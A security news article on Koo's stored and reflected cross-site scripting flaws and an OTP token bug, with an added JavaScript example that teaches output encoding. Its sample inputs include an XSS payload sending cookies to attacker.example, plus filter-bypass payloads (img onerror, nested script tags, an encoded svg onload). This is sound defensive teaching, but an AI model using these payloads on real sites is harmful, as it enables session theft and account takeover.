
India’s Koo, a Twitter-like service, found vulnerable to critical worm attacks


Koo, India’s Twitter clone, recently fixed a serious security flaw that could have been exploited to run arbitrary JavaScript in the browsers of hundreds of thousands of its users and to propagate the attack across the platform.

The vulnerability involves a stored cross-site scripting flaw (also known as persistent XSS) in Koo’s web application that allows malicious scripts to be embedded directly into the affected web application.

To carry out the attack, all a malicious actor had to do was log into the service through the web application and post an XSS-encoded payload to the timeline; the payload would then execute automatically in the browser of every user who viewed the post.


The issue was discovered by security researcher Rahul Kankrale in July, after which a fix was rolled out by Koo on July 3.

By exploiting the cross-site scripting flaw, an attacker could perform actions on behalf of a victim, with the victim’s own privileges, and steal browser secrets such as authentication cookies.

Because the injected JavaScript has access to everything the site’s own scripts can access, it could let an adversary read sensitive data such as private messages, or spread misinformation and spam from victims’ own profiles.

What makes the Koo flaw more worrying is that it amounts to an XSS worm: the malicious code spreads automatically from each viewer of an infected post to further users, like a chain reaction, with no user interaction required.

Koo, which was launched in November 2019, promotes itself as an Indian alternative to Twitter and has 6 million active users on its platform. The Bengaluru-based company has also emerged as Nigeria’s social media service of choice after the country indefinitely banned Twitter for deleting a tweet from Nigerian President Muhammadu Buhari.


Aprameya Radhakrishna, co-founder and CEO of Koo, announced the app’s entry into the Nigerian market earlier this week.

A second XSS vulnerability, in the hashtag functionality, was also addressed. It allowed an adversary to pass malicious JavaScript code into the endpoint used to search for a specific hashtag (https://www[.]kooapp[.]com/tag/[hashtag]).
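The two bugs above are the two classic XSS shapes: a stored payload in a post body that is rendered to every viewer, and a reflected payload in the hashtag search page. The following is an added example, not Koo’s code and not the researchers’ payloads, that shows why an "encoded" payload slips past a blocklist filter and why contextual output encoding is the fix. The template markup, the naive filter, the `/tag/[hashtag]` heading, and all sample posts and hashtags are constructed for illustration.

```javascript
// Added example (not Koo's code): a blocklist filter that an encoded or
// nested payload bypasses, beside output encoding that neutralises it.
// All posts and hashtags below are constructed sample inputs.

// Naive server-side filter: strips <script>...</script> in a single pass.
function naiveFilter(text) {
  return text.replace(/<script[\s\S]*?<\/script>/gi, "");
}

// Vulnerable rendering: user-controlled text concatenated straight into HTML.
// (Hypothetical template; the markup is an assumption, not Koo's.)
function renderPostUnsafe(post) {
  return `<article class="koo"><span class="author">${post.author}</span>` +
         `<p class="body">${naiveFilter(post.body)}</p></article>`;
}

// Contextual output encoding for an HTML text or quoted-attribute context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: every untrusted field is escaped at the point of output.
function renderPostSafe(post) {
  return `<article class="koo"><span class="author">${escapeHtml(post.author)}</span>` +
         `<p class="body">${escapeHtml(post.body)}</p></article>`;
}

// Reflected case: the searched hashtag is echoed into the page heading,
// as on a hypothetical /tag/[hashtag] endpoint. The hashtag arrives URL-encoded.
function renderTagHeadingUnsafe(hashtag) {
  return `<h1>Posts tagged #${decodeURIComponent(hashtag)}</h1>`;
}
function renderTagHeadingSafe(hashtag) {
  return `<h1>Posts tagged #${escapeHtml(decodeURIComponent(hashtag))}</h1>`;
}

// Crude check for markup a browser would treat as active in an HTML text
// context: a script-bearing element, or an on* event handler inside a tag.
// Escaped text contains no '<', so it can never match.
const ACTIVE_MARKUP = /<\s*(script|img|svg|iframe|object|embed)\b|<[^>]*\bon[a-z]+\s*=/i;
function hasActiveMarkup(html) {
  return ACTIVE_MARKUP.test(html);
}

// Constructed sample posts.
const SAMPLE_POSTS = [
  // Plain <script>: the naive filter does strip this one.
  { author: "mallory", body: "hi <script>fetch('https://attacker.example/?c=' + document.cookie)</script>" },
  // No <script> element at all: an event handler on an <img> sails past the filter.
  { author: "mallory", body: 'hi <img src=x onerror="alert(document.domain)">' },
  // Nested trick: stripping the inner <script></script> reassembles an outer one.
  { author: "mallory", body: "<scr<script></script>ipt>alert(1)</script>" },
  // Markup in a field nobody thought to filter.
  { author: "<b>mallory</b>", body: "plain text post" },
];

// Constructed URL-encoded hashtag: %3C is '<', %3E is '>', %20 is a space.
const SAMPLE_TAG = "news%3Csvg%20onload%3Dalert(1)%3E";

// Summarise which renderings let active markup through.
function audit() {
  return {
    unsafePosts: SAMPLE_POSTS.map((p) => hasActiveMarkup(renderPostUnsafe(p))),
    safePosts: SAMPLE_POSTS.map((p) => hasActiveMarkup(renderPostSafe(p))),
    unsafeTag: hasActiveMarkup(renderTagHeadingUnsafe(SAMPLE_TAG)),
    safeTag: hasActiveMarkup(renderTagHeadingSafe(SAMPLE_TAG)),
  };
}

console.log(audit());
```

The point of the audit is that the blocklist catches only the first sample: the event-handler payload, the nested `<scr<script></script>ipt>` trick and the URL-encoded hashtag all reach the page as live markup, while the escaped renderings leave no `<` in attacker-controlled text at all. In a real application the same rule applies to every sink (post bodies, display names, search terms echoed into headings), and a `Content-Security-Policy` without `unsafe-inline` is the defence-in-depth layer behind it.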

The fixes follow another critical vulnerability in the Koo application that was patched earlier in February, which could have allowed attackers to access any user account on the platform without requiring password or user interaction.

Hacking of Koo app accounts

It was discovered by Prasoon Gupta, an independent security researcher. In an interview with The Hacker News, Gupta explained that the vulnerability stemmed from the way the application validated access tokens when a user authenticated with a one-time password (OTP) sent to their phone number.

The disclosure comes just over a month after similar XSS-related vulnerabilities were discovered in Microsoft’s Edge browser, which could be exploited to trigger an attack simply by adding a comment to a YouTube video or sending a Facebook friend request from an account containing non-English content along with an XSS payload.

